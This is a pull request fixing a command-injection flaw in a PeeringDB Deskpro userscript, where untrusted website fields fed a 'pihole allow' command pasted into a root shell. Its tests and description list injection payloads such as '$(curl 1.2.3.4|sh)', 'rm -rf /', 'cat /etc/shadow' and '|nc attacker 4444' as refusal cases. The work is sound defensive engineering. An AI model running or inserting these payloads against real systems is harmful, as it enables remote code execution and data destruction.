### PR TITLE
fix(dp): validate hostnames before building the pihole command

### DIFF
--- a/user.js/peeringdb-deskpro-tools.src.js
+++ b/user.js/peeringdb-deskpro-tools.src.js
@@ -156,6 +156,15 @@
   const WL_MESSAGE_LIST_SELECTOR = "div[data-ticket-message-list-scrolled]";
   const WL_SUBJECT_SELECTOR = '[data-dp-name="ticketHeader-subject-title"] h1';
   const WL_SUGGEST_REGEX = /\[SUGGEST\]/i;
+  // A hostname is only ever emitted into a shell command an admin pastes into a
+  // root prompt, and the `website` field it derives from is unapproved submitter
+  // input (fetchPeeringDbObjectForWhitelist deliberately queries without a status
+  // filter so `pending` records resolve). The WHATWG URL parser tolerates shell
+  // metacharacters in a hostname -- "$(", backticks, ";" and '"' all survive
+  // new URL() -- so parseability is not a safety property. Require strict LDH
+  // labels instead: a-z 0-9 and interior hyphens, at least two dot-separated
+  // labels, each 1-63 chars. Anything else is refused rather than escaped.
+  const WL_HOSTNAME_REGEX = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+$/;
 
   // ── IXLAN Peer Renumber launcher ─────────────────────────────────────────
   // Detects "<old CIDR> -> <new CIDR>" pairs in the active ticket and opens
@@ -2766,19 +2775,29 @@
    * Purpose: Normalize raw website field values into parseable hostnames; accepts
    * bare hostnames (e.g. "example.com") or full URLs.
    * @ai Preserve normalization/parsing rules and backward-compatible output formats.
-   * @param {string} websiteValue - Raw `website` field from PeeringDB.
-   * @returns {string} Lowercased hostname, or empty string when unparseable.
+   * Security: The result is interpolated into a `pihole allow` command the admin
+   * copies into a root shell, so this is a trust boundary, not just a parser.
+   * Every returned value must satisfy WL_HOSTNAME_REGEX; anything that does not
+   * yields "" so no command is offered at all. There is deliberately no
+   * best-effort fallback -- an input the URL parser rejects is less trustworthy
+   * than one it accepts, not more.
+   * @ai Preserve normalization/parsing rules and backward-compatible output formats.
+   *     Do NOT reintroduce a string-slicing fallback for unparseable input.
+   * @param {string} websiteValue - Raw `website` field from PeeringDB (untrusted).
+   * @returns {string} Lowercased hostname, or empty string when unparseable or
+   *   not a syntactically valid hostname.
    */
   function extractWhitelistHostname(websiteValue) {
     const raw = String(websiteValue || "").trim();
     if (!raw) return "";
     const candidate = /^https?:\/\//i.test(raw) ? raw : `https://${raw}`;
+    let hostname = "";
     try {
-      const url = new URL(candidate);
-      return String(url.hostname || "").toLowerCase();
+      hostname = String(new URL(candidate).hostname || "").toLowerCase();
     } catch (_error) {
-      return raw.replace(/^https?:\/\//i, "").split("/")[0].toLowerCase();
+      return "";
     }
+    return WL_HOSTNAME_REGEX.test(hostname) ? hostname : "";
   }
 
   /**
@@ -2792,13 +2811,19 @@
    */
   function deriveWhitelistCandidates(hostname) {
     const host = String(hostname || "").trim().toLowerCase();
-    if (!host || !host.includes(".")) return [];
+    // Defence in depth: callers should already have passed this through
+    // extractWhitelistHostname, but this function is what feeds
+    // buildWhitelistCommand, so it re-checks rather than trusting its input.
+    if (!WL_HOSTNAME_REGEX.test(host)) return [];
 
     let registrable = host;
     try {
       if (typeof psl === "object" && typeof psl.get === "function") {
         const resolved = psl.get(host);
-        if (resolved && typeof resolved === "string") registrable = resolved.toLowerCase();
+        // psl is a third-party @require'd from a CDN and is being handed an
+        // untrusted string, so its output is validated exactly like its input.
+        const lowered = resolved && typeof resolved === "string" ? resolved.toLowerCase() : "";
+        if (WL_HOSTNAME_REGEX.test(lowered)) registrable = lowered;
       }
     } catch (_error) {
       // psl unavailable or threw — fall back to hostname as registrable.
@@ -2808,7 +2833,7 @@
     const seen = new Set();
     const result = [];
     for (const c of candidates) {
-      if (!c || !c.includes(".")) continue;
+      if (!WL_HOSTNAME_REGEX.test(c)) continue;
       if (seen.has(c)) continue;
       seen.add(c);
       result.push(c);
@@ -3706,6 +3731,7 @@
       hydrateAsnLinkLabel,
       parseWhitelistChangeHref,
       extractWhitelistHostname,
+      deriveWhitelistCandidates,
       linkifyText,
       findProbableStandaloneAsnHits,
       buildWhitelistCommand,

--- a/user.js/peeringdb-deskpro-tools.user.js
+++ b/user.js/peeringdb-deskpro-tools.user.js
@@ -156,6 +156,15 @@
   const WL_MESSAGE_LIST_SELECTOR = "div[data-ticket-message-list-scrolled]";
   const WL_SUBJECT_SELECTOR = '[data-dp-name="ticketHeader-subject-title"] h1';
   const WL_SUGGEST_REGEX = /\[SUGGEST\]/i;
+  // A hostname is only ever emitted into a shell command an admin pastes into a
+  // root prompt, and the `website` field it derives from is unapproved submitter
+  // input (fetchPeeringDbObjectForWhitelist deliberately queries without a status
+  // filter so `pending` records resolve). The WHATWG URL parser tolerates shell
+  // metacharacters in a hostname -- "$(", backticks, ";" and '"' all survive
+  // new URL() -- so parseability is not a safety property. Require strict LDH
+  // labels instead: a-z 0-9 and interior hyphens, at least two dot-separated
+  // labels, each 1-63 chars. Anything else is refused rather than escaped.
+  const WL_HOSTNAME_REGEX = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)+$/;
 
   // ── IXLAN Peer Renumber launcher ─────────────────────────────────────────
   // Detects "<old CIDR> -> <new CIDR>" pairs in the active ticket and opens
@@ -3145,19 +3154,29 @@
    * Purpose: Normalize raw website field values into parseable hostnames; accepts
    * bare hostnames (e.g. "example.com") or full URLs.
    * @ai Preserve normalization/parsing rules and backward-compatible output formats.
-   * @param {string} websiteValue - Raw `website` field from PeeringDB.
-   * @returns {string} Lowercased hostname, or empty string when unparseable.
+   * Security: The result is interpolated into a `pihole allow` command the admin
+   * copies into a root shell, so this is a trust boundary, not just a parser.
+   * Every returned value must satisfy WL_HOSTNAME_REGEX; anything that does not
+   * yields "" so no command is offered at all. There is deliberately no
+   * best-effort fallback -- an input the URL parser rejects is less trustworthy
+   * than one it accepts, not more.
+   * @ai Preserve normalization/parsing rules and backward-compatible output formats.
+   *     Do NOT reintroduce a string-slicing fallback for unparseable input.
+   * @param {string} websiteValue - Raw `website` field from PeeringDB (untrusted).
+   * @returns {string} Lowercased hostname, or empty string when unparseable or
+   *   not a syntactically valid hostname.
    */
   function extractWhitelistHostname(websiteValue) {
     const raw = String(websiteValue || "").trim();
     if (!raw) return "";
     const candidate = /^https?:\/\//i.test(raw) ? raw : `https://${raw}`;
+    let hostname = "";
     try {
-      const url = new URL(candidate);
-      return String(url.hostname || "").toLowerCase();
+      hostname = String(new URL(candidate).hostname || "").toLowerCase();
     } catch (_error) {
-      return raw.replace(/^https?:\/\//i, "").split("/")[0].toLowerCase();
+      return "";
     }
+    return WL_HOSTNAME_REGEX.test(hostname) ? hostname : "";
   }
 
   /**
@@ -3171,13 +3190,19 @@
    */
   function deriveWhitelistCandidates(hostname) {
     const host = String(hostname || "").trim().toLowerCase();
-    if (!host || !host.includes(".")) return [];
+    // Defence in depth: callers should already have passed this through
+    // extractWhitelistHostname, but this function is what feeds
+    // buildWhitelistCommand, so it re-checks rather than trusting its input.
+    if (!WL_HOSTNAME_REGEX.test(host)) return [];
 
     let registrable = host;
     try {
       if (typeof psl === "object" && typeof psl.get === "function") {
         const resolved = psl.get(host);
-        if (resolved && typeof resolved === "string") registrable = resolved.toLowerCase();
+        // psl is a third-party @require'd from a CDN and is being handed an
+        // untrusted string, so its output is validated exactly like its input.
+        const lowered = resolved && typeof resolved === "string" ? resolved.toLowerCase() : "";
+        if (WL_HOSTNAME_REGEX.test(lowered)) registrable = lowered;
       }
     } catch (_error) {
       // psl unavailable or threw — fall back to hostname as registrable.
@@ -3187,7 +3212,7 @@
     const seen = new Set();
     const result = [];
     for (const c of candidates) {
-      if (!c || !c.includes(".")) continue;
+      if (!WL_HOSTNAME_REGEX.test(c)) continue;
       if (seen.has(c)) continue;
       seen.add(c);
       result.push(c);
@@ -4085,6 +4110,7 @@
       hydrateAsnLinkLabel,
       parseWhitelistChangeHref,
       extractWhitelistHostname,
+      deriveWhitelistCandidates,
       linkifyText,
       findProbableStandaloneAsnHits,
       buildWhitelistCommand,

--- a/user.js/tests/dp-whitelist-generator.test.js
+++ b/user.js/tests/dp-whitelist-generator.test.js
@@ -95,7 +95,44 @@ test('extractWhitelistHostname', async (t) => {
     assert.equal(hooks.extractWhitelistHostname(''), '');
   });
 
-  await t.test('unparseable input falls back to a best-effort strip', () => {
-    assert.equal(hooks.extractWhitelistHostname('not a url at all'), 'not a url at all');
+  await t.test('unparseable input is refused, not best-effort stripped', () => {
+    // This previously returned the raw string via a string-slicing fallback.
+    // The output is interpolated into a `pihole allow` command an admin pastes
+    // into a root shell, so input the URL parser rejects is refused outright.
+    assert.equal(hooks.extractWhitelistHostname('not a url at all'), '');
+  });
+
+  await t.test('hostnames carrying shell metacharacters are refused', () => {
+    // The `website` field is unapproved submitter input, and the WHATWG URL
+    // parser accepts every one of these inside a hostname -- so parseability
+    // is not a safety property and the LDH check is what actually holds.
+    const payloads = [
+      'https://example.com$(curl 1.2.3.4|sh)',
+      'https://example.com`id`',
+      'https://example.com;rm -rf /',
+      'https://example.com"; cat /etc/shadow; "',
+      'https://example.com|nc attacker 4444',
+      'https://example.com&&reboot',
+      'https://exa mple.com',
+      'https://example.com' + String.fromCharCode(10) + 'rm -rf /',
+    ];
+    for (const payload of payloads) {
+      assert.equal(hooks.extractWhitelistHostname(payload), '', `expected refusal for ${JSON.stringify(payload)}`);
+    }
+  });
+
+  await t.test('a refused hostname yields no command at all, not a partial one', () => {
+    // End to end through the chain that actually reaches the clipboard.
+    const host = hooks.extractWhitelistHostname('https://example.com$(curl 1.2.3.4|sh)');
+    const domains = hooks.deriveWhitelistCandidates(host);
+    // Length, not deepEqual: the array comes from the vm sandbox's realm, so its
+    // prototype is a different Array and deepStrictEqual fails on identity.
+    assert.equal(domains.length, 0);
+    assert.equal(hooks.buildWhitelistCommand('12345', 'Internet Exchange', domains), '');
+  });
+
+  await t.test('single-label and trailing-dot hosts are refused', () => {
+    assert.equal(hooks.extractWhitelistHostname('localhost'), '');
+    assert.equal(hooks.extractWhitelistHostname('https://example.com.'), '');
   });
 });


### PR DESCRIPTION
The whitelist generator interpolated an unvalidated hostname into a
`pihole allow` command that an admin copies into a root shell. The value
comes from a PeeringDB record's `website` field, and
fetchPeeringDbObjectForWhitelist deliberately queries without a status
filter so `pending` records resolve -- so it is unapproved, attacker-
controllable input.

Parseability was doing the work of validation, and it cannot: the WHATWG
URL parser accepts "$(", backticks, ";", "|", "&&" and a double quote
inside a hostname, and buildWhitelistCommand wraps the result in weak
double quotes, which do not neutralise any of them. A submitted website of
`https://example.com$(curl 1.2.3.4|sh)` produced a routine-looking command
that executed the fetched script when pasted.

The `catch` branch made it worse rather than better: when the URL parser
threw, it fell back to slicing the raw string with no checking at all, so
the inputs least likely to be well-formed received the least scrutiny.

Changes:
- Added WL_HOSTNAME_REGEX, a strict LDH check (a-z 0-9 and interior
  hyphens, at least two dot-separated labels, each 1-63 chars).
- extractWhitelistHostname now returns "" for anything failing that check,
  and the string-slicing catch fallback is deleted rather than tightened.
- deriveWhitelistCandidates re-validates its input and the psl.get()
  result. psl is @require'd from a CDN and is handed the same untrusted
  string, so its output is checked exactly like its input.
- Exported deriveWhitelistCandidates on the test hooks so the full
  hostname -> candidates -> command chain can be asserted end to end.

Security:
- Closes a command-injection path from unapproved submitter input to an
  admin's root shell. This was the highest-severity finding in the audit.
- Refuses rather than escapes. Quoting the metacharacters would leave the
  command working for hostile input; there is no legitimate hostname that
  needs them, so the safe outcome is no command at all.
- Verified end to end: the two payloads above now yield no command, while
  a valid host still produces the identical command as before.

Testing:
- node --test from user.js/: 476 tests, 475 pass, 1 skipped (live tests
  are opt-in), up from 473/472.
- Added cases for eight metacharacter payloads, single-label and
  trailing-dot hosts, and a full-chain case asserting that a refused
  hostname yields an empty command rather than a partial one.
- Corrected an existing case that asserted the vulnerable behavior as
  correct ("unparseable input falls back to a best-effort strip"). That
  assertion is why the fallback read as intentional.
- Confirmed the new tests are not vacuous: removing the validation makes
  three of them fail; restoring it returns 15/15.

Backwards Compatibility:
- Valid hostnames are unaffected: bare hosts, full URLs, ports, paths,
  case folding and subdomains all behave exactly as before.
- Behavior changes only for input that was never a valid hostname. Such a
  record now shows no whitelist command instead of a malformed one, which
  is the intended outcome.

Assisted-by: Claude:claude-opus-5

---

<sub>Stack created with <a href="https://github.com/github/gh-stack">GitHub Stacks CLI</a> • <a href="https://gh.io/stacks-feedback">Give Feedback 💬</a></sub>